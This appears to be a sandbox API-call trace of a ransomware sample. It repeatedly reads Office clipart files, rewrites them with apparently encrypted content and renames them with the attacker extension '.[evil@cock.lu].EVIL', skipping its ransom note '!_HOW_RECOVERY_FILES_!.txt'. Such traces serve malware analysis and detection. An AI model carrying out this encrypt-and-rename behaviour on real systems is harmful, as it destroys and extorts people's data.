0x84b1160800 [0154.629] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.629] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf.[evil@cock.lu].evil")) returned 1 [0154.630] ??_V@YAXPEAX@Z () returned 0x1 [0154.634] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF", dwFileAttributes=0x200) returned 0 [0154.634] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.634] wcsstr (_Str="J0297269.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.634] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF") returned 69 [0154.634] wcscmp (_String1="J0297269.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.634] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297269.WMF") returned 0x0 [0154.634] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF") returned 0x45 [0154.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.637] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3d24, lpOverlapped=0x0) returned 1 [0154.645] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.645] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.645] _errno () returned 0x84b1160840 [0154.645] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.645] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3d40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3d40, lpOverlapped=0x0) returned 1 [0154.645] CloseHandle (hObject=0x1a8) returned 1 [0154.645] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.645] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.646] __uncaught_exception () returned 0x84b1160800 [0154.646] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.646] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297269.wmf.[evil@cock.lu].evil")) returned 1 [0154.647] ??_V@YAXPEAX@Z () returned 0x1 [0154.650] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297269.WMF", dwFileAttributes=0x200) returned 0 [0154.651] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.651] wcsstr (_Str="J0297725.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.651] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF") returned 69 [0154.651] wcscmp (_String1="J0297725.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297725.WMF") returned 0x0 [0154.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF") returned 0x45 [0154.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.653] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4236, lpOverlapped=0x0) returned 1 [0154.663] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.663] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.663] _errno () returned 0x84b1160840 [0154.663] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.663] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4240, lpOverlapped=0x0) returned 1 [0154.663] CloseHandle (hObject=0x1a8) returned 1 [0154.663] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.664] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.664] __uncaught_exception () returned 0x84b1160800 [0154.664] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.664] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297725.wmf.[evil@cock.lu].evil")) returned 1 [0154.665] ??_V@YAXPEAX@Z () returned 0x1 [0154.669] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297725.WMF", dwFileAttributes=0x200) returned 0 [0154.669] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.669] wcsstr (_Str="J0297727.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.669] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF") returned 69 [0154.669] wcscmp (_String1="J0297727.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.669] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297727.WMF") returned 0x0 [0154.669] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF") returned 0x45 [0154.670] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.672] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c9c, lpOverlapped=0x0) returned 1 [0154.679] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.679] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.679] _errno () returned 0x84b1160840 [0154.679] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.679] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x3ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ca0, lpOverlapped=0x0) returned 1 [0154.679] CloseHandle (hObject=0x1a8) returned 1 [0154.679] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.680] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.680] __uncaught_exception () returned 0x84b1160800 [0154.680] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.680] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297727.wmf.[evil@cock.lu].evil")) returned 1 [0154.681] ??_V@YAXPEAX@Z () returned 0x1 [0154.683] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297727.WMF", dwFileAttributes=0x200) returned 0 [0154.683] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.684] wcsstr (_Str="J0297757.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.684] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF") returned 69 [0154.684] wcscmp (_String1="J0297757.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.684] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297757.WMF") returned 0x0 [0154.684] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF") returned 0x45 [0154.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.686] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x493e, lpOverlapped=0x0) returned 1 [0154.702] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.702] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.702] _errno () returned 0x84b1160840 [0154.702] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.702] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4940, lpOverlapped=0x0) returned 1 [0154.702] CloseHandle (hObject=0x1a8) returned 1 [0154.702] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.703] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.703] __uncaught_exception () returned 0x84b1160800 [0154.703] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.703] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297757.wmf.[evil@cock.lu].evil")) returned 1 [0154.704] ??_V@YAXPEAX@Z () returned 0x1 [0154.707] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297757.WMF", dwFileAttributes=0x200) returned 0 [0154.707] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.707] wcsstr (_Str="J0297759.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.707] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF") returned 69 [0154.707] wcscmp (_String1="J0297759.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.707] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0297759.WMF") returned 0x0 [0154.707] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF") returned 0x45 [0154.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.709] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4960, lpOverlapped=0x0) returned 1 [0154.738] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.738] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.738] _errno () returned 0x84b1160840 [0154.738] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.738] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4980, lpOverlapped=0x0) returned 1 [0154.738] CloseHandle (hObject=0x1a8) returned 1 [0154.738] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.739] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.739] __uncaught_exception () returned 0x84b1160800 [0154.739] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297759.wmf.[evil@cock.lu].evil")) returned 1 [0154.743] ??_V@YAXPEAX@Z () returned 0x1 [0154.746] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297759.WMF", dwFileAttributes=0x200) returned 0 [0154.746] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.746] wcsstr (_Str="J0300862.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.746] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF") returned 69 [0154.746] wcscmp (_String1="J0300862.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.746] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0300862.WMF") returned 0x0 [0154.746] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF") returned 0x45 [0154.746] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.749] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4584, lpOverlapped=0x0) returned 1 [0154.757] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.757] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.757] _errno () returned 0x84b1160840 [0154.757] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.757] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x45a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x45a0, lpOverlapped=0x0) returned 1 [0154.757] CloseHandle (hObject=0x1a8) returned 1 [0154.757] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.758] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.758] __uncaught_exception () returned 0x84b1160800 [0154.758] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.758] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0300862.wmf.[evil@cock.lu].evil")) returned 1 [0154.759] ??_V@YAXPEAX@Z () returned 0x1 [0154.761] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0300862.WMF", dwFileAttributes=0x200) returned 0 [0154.761] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.761] wcsstr (_Str="J0301044.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.761] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF") returned 69 [0154.761] wcscmp (_String1="J0301044.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.761] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0301044.WMF") returned 0x0 [0154.761] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF") returned 0x45 [0154.762] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.764] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b0e, lpOverlapped=0x0) returned 1 [0154.770] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.770] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.770] _errno () returned 0x84b1160840 [0154.770] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.770] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b20, lpOverlapped=0x0) returned 1 [0154.770] CloseHandle (hObject=0x1a8) returned 1 [0154.770] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.771] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.771] __uncaught_exception () returned 0x84b1160800 [0154.771] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.771] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301044.wmf.[evil@cock.lu].evil")) returned 1 [0154.772] ??_V@YAXPEAX@Z () returned 0x1 [0154.774] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301044.WMF", dwFileAttributes=0x200) returned 0 [0154.775] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.775] wcsstr (_Str="J0301052.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.775] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF") returned 69 [0154.775] wcscmp (_String1="J0301052.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.775] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0301052.WMF") returned 0x0 [0154.775] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF") returned 0x45 [0154.775] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.776] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2ae8, lpOverlapped=0x0) returned 1 [0154.784] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.784] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.784] _errno () returned 0x84b1160840 [0154.784] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.784] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b00, lpOverlapped=0x0) returned 1 [0154.784] CloseHandle (hObject=0x1a8) returned 1 [0154.785] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.785] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.785] __uncaught_exception () returned 0x84b1160800 [0154.785] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.785] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf.[evil@cock.lu].evil")) returned 1 [0154.786] ??_V@YAXPEAX@Z () returned 0x1 